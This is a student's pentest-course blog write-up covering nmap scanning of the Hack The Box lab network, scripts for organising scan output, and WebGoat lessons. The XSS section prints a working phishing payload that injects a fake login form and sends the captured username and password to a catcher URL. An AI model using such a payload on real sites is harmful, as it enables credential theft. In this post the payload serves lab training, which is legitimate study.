Penetration testing exercises – h2

EDIT: This is a homework assignment of Tero Karvinen’s penetration testing course.

The penetration testing continues with Hack The Box penetration testing labs, basic nmap usage, and some more WebGoat exercises. I’m using Kali Linux in VirtualBox for the scanning, and WebGoat runs inside docker on my working Arch.

a) Ensure VPN tunnel is functioning

One has to be careful when doing port scans as it is most likely criminalized in your country. So we are making sure that the VPN tunnel to the Hack The Box (HTB) network is functioning and we are scanning the right network.

Got the VPN tokens from HTB, and I start the openvpn tunnel. I’m making it a background process so I can keep the same terminal. The command ‘fg’ brings the process to foreground, and can be terminated with ctrl-C. I’m pinging a lab machine that lives at 10.10.10.171.

Screenshot_2020-04-10_09-44-48

Screenshot_2020-04-10_09-36-03

Here are the commands:

$ sudo openvpn tqre.ovpn &
$ ip a
$ ip route
$ ping 10.10.10.171 -c 1
$ jobs
$ fg
<Ctrl-C pressed: ^C is shown on the output>
$ ping 10.10.10.171 -c 1

This confirms VPN tunnel is working as expected. Really have to remember to put it back on before proceeding! It’s probably wiser to leave the openvpn process in foreground and take the &-sign away.

$ sudo openvpn tqre.ovpn
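
A pre-scan check for the concern above, as an added example that is not part of the original post: it accepts a target only if it lies in 10.10.10.0/24 and the routing decision sends it out through the tunnel. The interface name tun0 matches the post; the function names and the sample `ip route get` lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: refuse to scan unless the target is in the lab range and
# is routed through the VPN. Assumes the tunnel is tun0 and the lab is 10.10.10.0/24.

# Print the egress interface named in one line of `ip route get` output.
route_dev() {
    printf '%s\n' "$1" |
        awk '{ for (i = 1; i < NF; i++) if ($i == "dev") { print $(i + 1); exit } }'
}

# Succeed only if target is 10.10.10.0-255 and its route leaves via the tunnel.
in_scope() {
    target=$1; route_line=$2; tun=${3:-tun0}
    case $target in
        10.10.10.*) last=${target#10.10.10.} ;;
        *) return 1 ;;
    esac
    case $last in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "${#last}" -le 3 ] && [ "$last" -le 255 ] || return 1
    [ "$(route_dev "$route_line")" = "$tun" ]
}

# Constructed samples of `ip route get` output: tunnel up, then tunnel down.
VPN_UP='10.10.10.171 via 10.10.14.1 dev tun0 src 10.10.14.23 uid 1000'
VPN_DOWN='10.10.10.171 via 192.168.1.1 dev eth0 src 192.168.1.50 uid 1000'

# Live use: pass a target address and the real routing decision is checked.
if [ -n "${1:-}" ]; then
    if in_scope "$1" "$(ip route get "$1" 2>/dev/null | head -1)"; then
        echo "OK: $1 is reached through tun0"
    else
        echo "STOP: $1 is not routed through tun0, do not scan" >&2
        exit 1
    fi
fi
```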

b) Active scanning the HTB network with nmap

Knowing your tools lessens the probability of ending up in jail doing the wrong thing inadvertently. Assuming nmap’s ‘Stealth scan’ is stealthy is like assuming you save money when you buy stuff.

The previous lecture introduced the pythonpy package, which looked like a convenient way to pipe stuff into python code on the fly:

$ apt-cache search pythonpy
pythonpy - 'python -c', with tab completion and shorthand

From various Internet sources and notes from the lecture, I’ll scan the whole HTB LAN. I’m also going to monitor the traffic on the tun0 interface with tshark. And I’ll use the tcpdump program to capture all the scan traffic for later examination. One terminal for each command.

$ sudo tshark -i tun0
$ sudo tcpdump -i tun0 -w HTBlanscan.pcap
$ time sudo nmap -v 10.10.10.0/24 -oA HTBlanscan

‘-oA’ option with nmap writes the scan results in 3 different files for further processing. I also want to know how long the scan takes. Here is a screenshot of the scan in progress:

Screenshot_2020-04-10_11-41-58

Scan took ~150 seconds. Next I’ll get the hosts that the scan found into a file:

$ grep Up HTBlanscan.gnmap | py -x 'x.split()[1]' > HTBhostIPs
$ cat HTBhostIPs

Screenshot_2020-04-10_11-53-09

Now I’m starting to think about how to get the scan information neatly into individual directories… awk and bash and so on. Automate everything!

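#!/bin/bash
# Create one directory per host (named after the last octet) and copy
# that host's section of the scan report into it.
for IP in $(awk -F'.' '{print $4}' HTBhostIPs); do
  mkdir -p "$IP"
  # Dots are escaped and \b ends the match, so 10.10.10.17 does not also match 10.10.10.171
  sed -n "/10\.10\.10\.$IP\b/,/^$/p" HTBlanscan.nmap > "$IP/scanreport.txt"
done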

Yay! We have a directory for each server, and the initial scan result in a file!

$ ls -R

Screenshot_2020-04-10_12-48-32

More information with nmap

I found a few cheatsheet/tutorials, which give a good introduction of how to work with nmap. Of course, the manpage is very informational, and nmap.org has it all.

https://www.edureka.co/blog/nmap-tutorial/
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/

Basic information from each target machine is now neatly organized. Next we want some more details. I’ll start with one server to test the -sV switch. Again, I’ll save all the network traffic with tcpdump, and monitor the process with tshark. Tcpdump performs faster (gut feeling), and tshark’s output is more readable. I’ll go with a target (10.10.10.171) that is considered easy, as I want to hack that box later!

For starters I did 2 scans:

$ time sudo nmap -sV --script=banner 10.10.10.171 -oA 001_banners
$ time sudo nmap -sV 10.10.10.171 -oA 002_nV

Here is a screenshot of the results:

Screenshot_2020-04-11_12-42-36

What did the banner scripts actually do? They took almost 4 times longer. Also, we scanned only 1000 ports out of 2^16.

The faster -sV option could be used on the whole HTB LAN. Essentially the information looks the same, but there must be something to the banner scripts. I’ll leave that for later.

HTB LAN version information with -sV

I’ll use the list of hosts generated earlier with -iL option.

$ time sudo nmap -sV -iL HTBhostIPs -oA HTBlan_sV

This one took 7 minutes… Let’s take a look at the results, but first I’d like to put them neatly into directories 😉 The script I made earlier does this with small modifications. I’ll append the results to the same file that’s already there.

I also want to add the scan options to the file. They can be found on the very first line of the scan.

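#!/bin/bash
# Append the -sV results for each host to its existing scanreport.txt.
for IP in $(awk -F'.' '{print $4}' HTBhostIPs); do
    # The first line of the .nmap file records the scan options.
    head -1 HTBlan_sV.nmap >> "$IP/scanreport.txt"
    # Dots are escaped and \b ends the match, so 17 does not also match 171.
    sed -n "/10\.10\.10\.$IP\b/,/^$/p" HTBlan_sV.nmap >> "$IP/scanreport.txt"
done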

After running both the scan and the script, let’s look at the information gathered from 10.10.10.172

$ cat 172/scanreport.txt

Screenshot_2020-04-11_13-51-17

Looking at the results we have on port 636 in this particular server: first scan says it is ldapssl service, but the more intense version scan says it’s tcpwrapped. Looks like the basic scan is just telling what the port is usually used for.

There is one more ‘standard’ flag to use: ‘-A’. This should tell us also the operating system. I’ll run a scan with the same techniques on the HTB LAN network using:

$ time sudo nmap -A -iL HTBhostIPs -oA HTBlan_A

This was by far the most time consuming scan: 22,5 minutes, so I expect the results to be more detailed, with an 11M pcap file along.

The data is a lot more detailed indeed; it seems that scripts are triggered according to the services discovered, and information is extracted accordingly. These are from a Windows host, smb is a Server Message Block, which is a distributed filesystem…

Screenshot_2020-04-11_19-20-24

But distributing this data into directories with scripts turned out not to be as straightforward. There are blank lines and some servers have way more information than others. I’ll skip the script writing part for now… the scans are there, it’s simple to fish the right one when I descend to hack the boxes…
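
One way to do the split that survives the blank lines in `-A` output, as an added example rather than the author's script: blocks are cut at each "Nmap scan report for" header instead of at the first empty line, and the whole address is parsed so 10.10.10.17 and 10.10.10.171 stay separate. The function names and the sample report are constructed.

```shell
#!/bin/sh
# Added example (not the post's script): split nmap normal output (.nmap) into
# <last octet>/scanreport.txt, cutting at each "Nmap scan report for" header.
split_report() {
    report=$1; outdir=${2:-.}; prev=
    tab=$(printf '\t')
    awk '
        NR == 1 { header = $0; next }   # first line holds the scan options
        /^Nmap scan report for / {
            ip = $NF                    # "10.10.10.172" or "(10.10.10.172)"
            gsub(/[()]/, "", ip)
            octet = ""
            if (ip ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {
                split(ip, part, ".")
                octet = part[4]
                print octet "\t" header
            }
        }
        # Trailer lines after the last host belong to no host.
        /^(# Nmap done|Read data files from|(OS and )?Service detection performed)/ { octet = "" }
        octet != "" { print octet "\t" $0 }
    ' "$report" |
    while IFS=$tab read -r octet line; do
        [ "$octet" = "$prev" ] || mkdir -p "$outdir/$octet"
        prev=$octet
        printf '%s\n' "$line" >> "$outdir/$octet/scanreport.txt"
    done
}

# Constructed sample of -A normal output: two hosts, blank line inside a block.
sample_report() {
    cat <<'EOF'
# Nmap scan initiated (constructed sample) as: nmap -A -iL HTBhostIPs -oA HTBlan_A
Nmap scan report for 10.10.10.17
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH

Host script results:
|_clock-skew: 1s

Nmap scan report for 10.10.10.171
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

# Nmap done at (constructed) -- 2 IP addresses (2 hosts up) scanned
EOF
}
```

Run it as `split_report HTBlan_A.nmap .` from the directory that already holds the per-host folders; results are appended, as in the earlier scripts.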

More?

Is there more to do with active scanning? Oh yes there is: nmap comes equipped with scripts made with NSE, which stands for Nmap Scripting Engine. They are located in ‘/usr/share/nmap/scripts/’. As far as I can tell, some of these are run with the ‘-A’ flag.

There is already tons of information to look into, not forgetting the pcap files I created with tcpdump. Deep insight into what actually went on while the scanning was performed is in those capture files.

Faster?

If looking for speed instead of versatility: masscan is the one to use. Nmap has also the options -T<0-5>, higher is faster.

c) WebGoat (7.1) – more lessons

Code Quality: Discover clues in the HTML
Look! Someone left credentials in the HTML comments. TY for admin access…

Concurrency: Thread Safety Problems & Shopping Cart Concurrency Flaw
Using 2 browsers at the same time, the first one gets solved just by entering the given usernames in different browsers (different tabs work too?): the browser that presses the submit button right after the first one gets to see the first one’s information.

The second one is similar. I found the right sequence with trial and error: make your way to the purchase window with a cheap order, then update the items in a second browser. When you confirm the purchase, the price stays what it was earlier.

Cross-Site Scripting (XSS): Phishing with XSS
The following code pasted to the search bar makes a form and sends the user credentials on a button press to a malicious localhost address:

<br>
<form>
Username:<input type="text" id="username"></input><br>
Password:<input type="password" id="pwd"></input><br>
<input type="submit" value="Submit" onclick=send()>
</form>

<script>
function send() {
    var username = document.getElementById("username").value;
    var pwd = document.getElementById("pwd").value;
    var url = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes ";
    url += "&user=" + username;
    url += "&password=" + pwd;
    var http = new XMLHttpRequest();
    http.open("GET", url, false);
    http.send();	
}
</script>

e) Hack the Box: go for one machine!

I did a few preliminary scans on my first chosen target: 10.10.10.171

The post continues here behind a password: no spoilers. And the password is: ZEdWeWIyNXdaVzUwWlhOMENnPT0K

 

Published by:

Tuomo Kuure (tqre)

A professional double bassist and a ICT infrastructure student with good Linux skills. Coding skills include Python, shell scripting and Java. C and asm bubbling under. Main interests are Linux-related: cloud, configuration management, security and kernel programming.
